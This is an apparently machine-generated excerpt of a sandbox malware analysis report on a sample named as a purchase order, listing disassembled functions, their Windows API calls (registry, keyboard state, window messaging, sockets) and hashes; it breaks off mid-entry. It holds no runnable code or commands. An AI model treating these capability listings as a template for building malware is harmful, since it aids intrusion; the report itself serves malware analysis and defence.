                                                            • _wcstok.LIBCMT ref: 004675B2
                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                            • String ID: X
                                                            • API String ID: 780548581-3081909835
                                                            • Opcode ID: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                            • Opcode Fuzzy Hash: d2e7fab411aea0598dfd2bf5d0f156e5f0b1b051b12d5a137b82cd3b72d64586
                                                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                            Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                            • CloseFigure.GDI32(?), ref: 0044751F
                                                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                            • String ID:
                                                            • API String ID: 4082120231-0
                                                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                            Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 2027346449-0
                                                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                            Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetMenu.USER32 ref: 0047A703
                                                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                            • _wcslen.LIBCMT ref: 0047A79E
                                                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 3257027151-0
                                                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                            Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastselect
                                                            • String ID:
                                                            • API String ID: 215497628-0
                                                            • Opcode ID: 1468281f9cf0934abd1b1669512be34cf69b73f31855631c1820efa4222e7528
                                                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                            • Opcode Fuzzy Hash: 1468281f9cf0934abd1b1669512be34cf69b73f31855631c1820efa4222e7528
                                                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                            Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0044443B
                                                            • GetKeyboardState.USER32(?), ref: 00444450
                                                            • SetKeyboardState.USER32(?), ref: 004444A4
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                            Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00444633
                                                            • GetKeyboardState.USER32(?), ref: 00444648
                                                            • SetKeyboardState.USER32(?), ref: 0044469C
                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                            Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                            • String ID:
                                                            • API String ID: 2354583917-0
                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                            Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                            Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                            • String ID:
                                                            • API String ID: 896007046-0
                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                            Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                            • GetFocus.USER32 ref: 00448ACF
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                            • String ID:
                                                            • API String ID: 3429747543-0
                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                            Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                              • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                              • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 3300667738-0
                                                            • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                            • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                            • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                            Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu$\VH
                                                            • API String ID: 3164766367-2432546070
                                                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                            Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                            Download Yara Rule
                                                            APIs
